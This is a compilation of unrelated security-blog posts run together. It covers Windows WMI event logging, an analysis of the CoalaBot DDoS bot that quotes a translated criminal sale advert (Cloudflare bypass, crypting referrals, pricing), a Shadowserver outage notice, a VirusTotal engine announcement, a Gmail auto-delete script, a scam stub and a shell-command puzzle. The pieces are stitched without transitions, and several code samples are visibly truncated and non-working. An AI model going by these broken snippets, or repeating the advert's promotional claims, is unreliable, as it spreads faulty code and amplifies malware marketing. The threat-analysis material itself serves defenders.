The way events operate by monitoring for specific events generated by the CIM Database in Windows. WMI Events are those events that happen when a specific Event Class instance is created or they are defined in the WMI Model. The way most event work is by the creation of a query that defines what we are looking for to happen, a action that will be taken once the event happens and both are registered together. There are 2 types of WMI Event Subscription:

  • Temporary – Subscription is active as long as the process that created the subscription is active. (They run under the privilege of the process)
  • Permanent – Subscription is stored in the CIM Database and are active until removed from it. (They always run as SYSTEM)

Temporary Events

One of the areas where some have moved to now that the detection of permanent WMI events is more common due to some tools is the use of temporary event consumers. This can be written in C++, .Net, WSH and PowerShell, they allow the use of WMI Event filters to trigger an action that is executed by the application it self. These are not common but easy to write and operate as long as the application is running. We can track this events with events with Id 5860. Once the application registers the Event Consumer the event is created. 

Here is an example in PowerShell of a temporary event consumer that simply writes the name of a process that has been launched. 

# Query for new process events 
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5" + 
    "WHERE TargetInstance ISA 'Win32_Process'" 

# Create an Action
$CrateAction = {
    $name = $
    write-host "Process $($name) was created."

# Register WMI event 
Register-WMIEvent -Query $queryCreate -Action $CrateAction 

When the Event Consumer is registered with Register-WmiEvent we get the following event logged on the system.


We can see that the Query being used to monitor for events is logged under UserData under the element Query and under the element PlaussibleCause we see that it is marked as Temporary. 

Permanent Events

When a __EventFilter, and any of the consumer type class objects are used in the creation of a Binder instance in the WMI CIM Database to create a permanent event a eventlog entry with Id 5861 is created. The event is also created in modification if any of the component class instances are modified. The event will contain all the information associated about the permanent even in the UserData element under the PossibleCause subelement.


When __EventFilter or Consumer that make up a permanent event is modified it generates the same event but there is no field in the data to show if it was modified or not. 

The event says to look at Event Id 5859 for the __EventFilter class that makes up the permanent event but at the moment I have not seen a event created with this Id in all my testing. 


As you can see Microsoft has improved quiet a bit the natural logging capabilities in the latest version of Windows. Sadly this has not been back ported to Windows 7 and Windows 2008/2008 R2. We are able to track:

  • Query Errors.
  • Temporary Event Creation
  • Permanent Event Creation and Modification
  • Loading of Providers.

From a Red Team perspective this lets us know that our actions can be tracked and we should look if this events are collected when we measure the level of maturity of the target. From a Blue Team perspective these are events you should be collecting and analyzing in your enviroment for possible malicious actions. 

CoalaBot : http Ddos Bot

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)

I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :
CoalaBot: Login Screen
(August Stealer alike) 

CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: Tasks
CoalaBot: Tasks

CoalaBot: New Taks (list)

CoalaBot: https get task details

CoalaBot: http post task details

CoalaBot: Settings
Here is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.
(Thanks to Andrew Komarov and others who provided help here).
Coala Http Ddos Bot

The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.

Attack types:

* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)
• ~100kb after obfuscation
• Auto Backup (optional)
• Low CPU load for efficient use
• Encryption of incoming/outgoing traffic
• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)
• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.
• Ability to link a build to more than one gate.

• Detailed statistics on time online/architecture/etc.
• List of bots, detailed information
• Number count of requests per second (total/for each bot)
• Creation of groups for attacks
• Auto sorting of bots by groups
• Creation of tasks, the ability to choose by group/country
• Setting an optional time for bots success rate


• Providing macros for randomization of sent data
• Support of .onion gate
• Ability to install an additional layer (BOT => LAYER => MAIN GATE)


• PHP 5.6 or higher
• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions


• Created tasks -


• $300 - build and panel. Up to 3 gates for one build.
• $20 - rebuild
The price can vary depending on updates.
Escrow service is welcome.

Help with installation is no charge.


VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Oops, We’re Doing it Again

  • freed0 – Morning all, how is everything going?  Glad we are not in that old data center any more.  There were those odd smells in there.
  • Chief Architect – We have to move again.
  • freed0 – Yes, it is a lovely day outside, I think I might just wander aimless around the parking lot.  You know I have to stay in shape for those rant walks I do with David.
  • Chief Architect – We have to move the Data Center again.
  • freed0 – lalalalalala
  • Chief Architect – It is happening in two weeks, we have been preparing for months while you have been hiding in your basement watching Anime
  • freed0 – Hey, it was classic Gatchaman!
  • Chief Architect – So, you need to inform everyone.
  • Stew – We should tell everyone the day after we are completed, much like all the Power Outages!
  • Senior Analyst – [Smacks Stew], bad Stew, bad, bad Stew


Well, I hope everyone remembers last year when we moved successfully.  At that time we acquired a larger space and started the arduous process of negotiations on what will really happen to the new space and how the move will take place.  Move forward ten months and we finally have a set in stone move date.  Even that was possible to change as of this week, but now everything is going if we like it or not.


Planned downtime:  2017-10-27 to 2017-11-03

Everything will go down on the morning of 2017-10-27. We are planning to have everything back and running with full operational capacity in place by 2017-11-03 only sliding into the weekend in the event of unplanned complications.  The team will work to get services restored earlier if possible.

The Bad News

For about a week, our processing, analysis, and data repositories will be offline. That means there will be no reports, no malware analysis, no downloads, no API… in short, nothing will be available during that time. But sorry to all the black hat wearers out there: we’ll be back and bigger than ever, processing more malware, scanning faster, and sending out even more reports to those that fix the problems we find.

Did we show you the beautiful pictures of our current place?  It is so nice.  It almost makes you want to live there, except for the need of a parka.  Maybe the Norwegian team members can live there.

The Good News

The new space will be just and pretty and using the same racks and pods, but a different cooling system since we will be moving to a raised floor this time.  We will enjoy a 10% increase of physical space as well as a 15% increase in power and cooling capacity, plus adding in four additional racks for us to fill.  Overall it will be a nice space and we will include pictures once completed, but it will all be fine and work out well for us and all of you.

How can you help?

Currently your reports are created from our scans of 3.7 billion routable IPv4 addresses on ~30 ports daily, sinkhole collection of victims, and process around a 0.5-1.5 million malware samples per day, distribute 30,000 to 40,000 daily reports to 90 National CERTs and 4500+ customers, and generate some 120,000 charts daily.  As a US 501c3 non-profit organization that does not charge for its services, we survive through tax deductible donations, sponsorships, as well as funded project work to expand out what we are able to do.  We share our data for no cost with direct network owners and National CERTs all over the world. We do not ask for credit, only the occasional support. If you think you might be able to help us out, please contact us by email at admin*at*shadowserver*dot*org.


This is just a part of business.  We just have to roll with it.

VirusTotal += eGambit

We welcome eGambit Artificial Intelligence engine scanner to VirusTotal. This module is part of the whole eGambit solution developed by TEHTRIS company, in Bordeaux, France. In the words of the company:

“eGambit, the Cyber Defense Arsenal, was created by the TEHTRIS company. This new take on cybersecurity, proposes unified enhanced technologies : advanced Endpoint Security agents, unlimited SIEM, Honeypots, NIDS, Deep Learning, etc. eGambit offers a worldwide 24/7 Security Threat Monitoring, Breach Assessment and Incident Response Service. In particular, the eGambit Artificial Intelligence engine module, deployed on VirusTotal, fight against unknown Windows malwares such as stealth spywares, ransomwares, keyloggers, viruses, etc.”

TEHTRIS has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by SKD-LABS, an AMTSO-member tester.

Automatically deleting old Gmail email

Like many of you I’m a gmail hoarder. I never deleting anything, just “archive” everything. I “might” need it later, or “I’ll get to it when I have time”. If we get really honest with ourselves, we never will actually get to it, and because we have this buffer, this procrastination opportunity, we grab it. We use words like “but I may need proof of X”, or “I could need to reference this”, or “I don’t really want to put this person in my contacts so I’ll just save the email”.

Personally I have made a choice to force myself to be more engaged in my email going forward. I have set a Google Script to run through all of my email every day and if it is older than 90 days, and doesn’t have the specail label “keep” on it, it’s gone. I obviously didn’t care enough about whatever was going on in that email to take the time to respond to it.

Whatever your reason for finding this post, here is how I got it done:

At first I started with just searching for a way to make a simple filter to do this. There are plenty of blog posts that show you this is possible, but it turns out that at some point Gmail switched to only applying filters to incoming messages (makes sense, lots less overhead, no need to load EVERYONEs email every hour). This makes deleting messages older than X impossible with simple filters however. I did however learn of a search query term you can use to find messages/threads older than X. Imaginatively called older_than:. So a search in Gmail for older_than:90d resulted in exactly the emails I wanted to find.

That’s when I started looking into Google Scripting. The language is pretty easy and straight forward if you have ever programmed in anything like Javascript or C++.

Using the API reference here: I was able to cobble together the following in about 20 minutes:

function DeleteOldEmail () {
	var threads;
	var thread;

	threads ="older_than:90d");
	for(var i = 0; i < threads.length; i++)
		var thread = threads[i];

Now, that script leaves a lot to be desired. It doesn’t have any case where a label like “save” or “keep” might come into play, it just hauls off and deletes everything old. But before we start improving lets show you how it looks when you’re actually doing it (I’ll comment out the “moveThreadToTrash in the screenshots)

Go to and you’ll be presented with a new project if you haven’t been here before:

Then, copy and past the code in and save it. It’ll ask you to name the project. I just named it DeleteOldEmail. Feel free to name it anything you wish. It is what is going to show up in your Google Security “Approve Apps” list.

The first time I ran this I commented out the lines for deleting and added in a “Logger” line just so I knew what would be deleted:

function DeleteOldEmail () {
	var threads;
	var thread;

	threads ="older_than:90d");
	for(var i = 0; i < threads.length; i++)
      var thread = threads[i];

Then run it, the first time you run it, it will ask for permissions:

If you try this out and decide you don’t like it you can revoke the permissions here:

If you went with the logging you’ll see something like this if you go to View->Logs:

Last step is to set this up so it automatically runs, I mean that’s the whole point. For that, we go to Edit->Current Project’s Triggers. And we are greeted with the following (once we click to add a new trigger):

I chose to set up mine to run every 12 hours, but you can set it to run once a day, once a week, whatever.

Again, this script leaves a lot to be desired, You can totally mess with the query search string any way you wish. I’ve created a Github repository that I’ll put improvements on the script:

Have fun with it. The two improvments I’ll be adding are the label exclusion for “keep” and notifications (a list of email subjects deleted)

Thanks for your time.

Scam: "Help Your Child To Be A Professional Footballer." /

This spam email is a scam: Subject:       Help Your Child To Be A Professional Footballer.From:       "FC Academy" []Date:       Sun, October 8, 2017 10:30 amTo:       "Recipients" []Priority:       NormalHello,Does your child desire to become a professional footballer?Our football academy are currently scouting for young football player to participate in 3-6

Episode #181: Making Contact

Hal wanders back on stage
Whew! Sure is dusty in here!
Man, those were the days! It started with Ed jamming on Twitter and me heckling from the audience. Then Ed invited me up on stage (once we built the stage), and that was some pretty sweet kung fu. Then Tim joined the band, Ed left, and the miles, and the booze, and the groupies got to be too much.
But we still get fan mail! Here's one from superfan Josh Wright that came in just the other day:
I have a bunch of sub-directories, all of which have files of various names. I want to produce a list of directories that do not have a file starting with "ContactSheet-*.jpg".
I thought I would just use "find" with "-exec test":
find . -type d \! -exec test -e "{}/ContactSheet\*" \; -print
Unfortunately, "test" doesn't support globbing, so this always fails.
Here's a sample directory tree and files. I thought this might be an interesting CLKF topic.
$ ls
Adriana Alessandra Gisele Heidi Jelena Kendall Kim Miranda
$ ls *
Adriana-1.jpg Adriana-3.jpg Adriana-5.jpg
Adriana-2.jpg Adriana-4.jpg Adriana-6.jpg

Alessandra-1.jpg Alessandra-4.jpg ContactSheet-Alessandra.jpg
Alessandra-2.jpg Alessandra-5.jpg
Alessandra-3.jpg Alessandra-6.jpg

Gisele-1.jpg Gisele-3.jpg Gisele-5.jpg
Gisele-2.jpg Gisele-4.jpg Gisele-6.jpg

ContactSheet-Heidi.jpg Heidi-2.jpg Heidi-4.jpg Heidi-6.jpg
Heidi-1.jpg Heidi-3.jpg Heidi-5.jpg

ContactSheet-Jelena.jpg Jelena-2.jpg Jelena-4.jpg Jelena-6.jpg
Jelena-1.jpg Jelena-3.jpg Jelena-5.jpg

Kendall-1.jpg Kendall-3.jpg Kendall-5.jpg
Kendall-2.jpg Kendall-4.jpg Kendall-6.jpg

ContactSheet-Kim.jpg Kim-2.jpg Kim-4.jpg Kim-6.jpg
Kim-1.jpg Kim-3.jpg Kim-5.jpg

Miranda-1.jpg Miranda-3.jpg Miranda-5.jpg
Miranda-2.jpg Miranda-4.jpg Miranda-6.jpg
OK, Josh. I'm feeling you on this one. Maybe I can find some of the lost magic.
Because Josh started this riff with a "find" command, my brain went there first. But my solutions all ended up being variants on running two find commands-- get a list of the directories with "ContactSheet" files and "subtract" that from the list of all directories. Here's one of those solutons:
$ sort <(find * -type d) <(find * -name ContactSheet-\* | xargs dirname) | uniq -u
The first "find" gets me all the directory names. The second "find" gets all of the "ContactSheet" files, and then that output gets turned into a list of directory names with "xargs dirname". Then I use the "<(...)" construct to feed both lists of directories into the "sort" command. "uniq -u" gives me a list of the directories that only appear once-- which is the directories that do not have a "ContactSheet" file in them.
But I wasn't cool with running the two "find" commands-- especially when we might have a big set of directories. And then it hit me. Just like our CLKF jam is better when I had my friends Ed and Tim rocking out with me, we can make this solution better by combining our selection criteria into a single "find" command:
$ find * \( -type d -o -name ContactSheet\* \) | sed 's/\/ContactSheet.*//' | uniq -u
By itself, the "find" command gives me output like this:
$ find * \( -type d -o -name ContactSheet\* \)
Then I use "sed" to pick off the file name, and I end up with the directory list with the duplicate directory names already sorted together. That means I can just feed the results into "uniq -u" and everything is groovy!
Cool, man. That was cool. Now if only my friends Ed and Tim were here, that would be something else.

A Wild-Eyed Man Appears on Stage for the First Time Since December 2013
Wh-wh-where am I?  Why am I covered with dust?  Who are you people?  What's going on?

This all looks so familiar.  It reminds me of... of... those halcyon days of the early Command Line Kung Fu blog.  A strapping young Tim Medin throwing down some amazing shell tricks.  Master Hal Pomeranz busting out beautiful bash fu.  Wow... those were the days.  Where the heck have I been?

Oh wait... what?  You want me to solve Josh's dilemma using cmd.exe?  What, am I a trained monkey who dances for you when you turn the crank on the music box?  Oh I can hear the sounds now.  That lovely music box... with its beautiful tunes that are so so so hypnotizing... so hypnotizing...

...and then Ed starts to dance...

I originally thought, "Uh-oh... a challenge posed by Josh Wright and then smashed by Hal is gonna be an absolute pain in the neck in cmd.exe, the Ruprecht of shells."  But then, much to my amazement, the answer all came together in about 3 minutes.  Here ya go, Big Josh.

c:\> for /D /R %i in (*) do @dir /b %i | find "ContactSheet" > nul || echo %i

The logic works thusly:

I've got a "for" loop, iterating over directories (/D) in a recursive fashion (/R) with an iterator variable of %i which will hold the directory names.  I do this for everything in the current working directory and down (in (*)... although you could put a directory path in there to start at a different directory).  That'll spit out each directory. At each iteration through the loop, I do the following:
  • Turn off the display of commands so it doesn't clutter the output (@)
  • Get a directory listing of the current directory indicated by the iterator variable, %i.  I want this directory listing in bare form without the Volume Name and Size cruft but with full path (/b).  That'll spew all these directories and their contents on standard out.  Remember, I'm recursing using the /R in my for loop, so I don't need to use a /s in my dir command here.
  • I take the output of the dir command and pipe it through the find command to look for the string "ContactSheet".  I throw out the output of the find command, because it's a bunch of cruft where it actually finds ContactSheet.
  • But, if the find command FAILS to see the string "ContactSheet" (||), I want to display the path of the directory where it failed, so I echo %i.
Voilamundo!  There you go!  The output looks like this:

c:\tmp\test>for /D /r %i in (*) do @dir /b /s %i | find "ContactSheet" > nul || echo %i

I'd like to thank Josh for the most engaging challenge!  I'll now go back into my hibernative state.... Zzzzzzzzz...

...and then Tim grabs the mic...

What a fantastic throwback, a reunion of sorts. Like the return of Guns n' Roses, but more Welcome to the Jungle than Paradise City, it gets worse here everyday. We got everything you want honey, we know the commands. We are the people that can find whatever you may need.

Uh, sorry... I've missed the spotlight here. Let's get back to the commands. Here is a working command in long form and shortened form:

PS C:\Photos> Get-ChildItem -Directory | Where-Object { -not (Get-ChildItem -Path $_ -Filter ContactSheet*) }

PS C:\Photos> ls -di | ? { -not (ls $_ -Filter ContactSheet*) }

Let's take it day piece by day piece. If you want it you're gonna bleed but it's the price to pay. Well, actually, it isn't that difficult so no bleeding will be involved.

The first portion simply gets a list of directories in the current directory.

Next, we have a Where-Object filter that will pass the proper objects down the pipeline. In the filter we need to look for files in the directory passed down the pipeline ($_) containing files that start with ContactSheet. We simply invert the search with the -not operator.

With this command you can have everything you want but you better not take it from me... the other guys did some excellent work. We've missed ya'll and hopefully we will see you again. Now back into the cave to hibernate.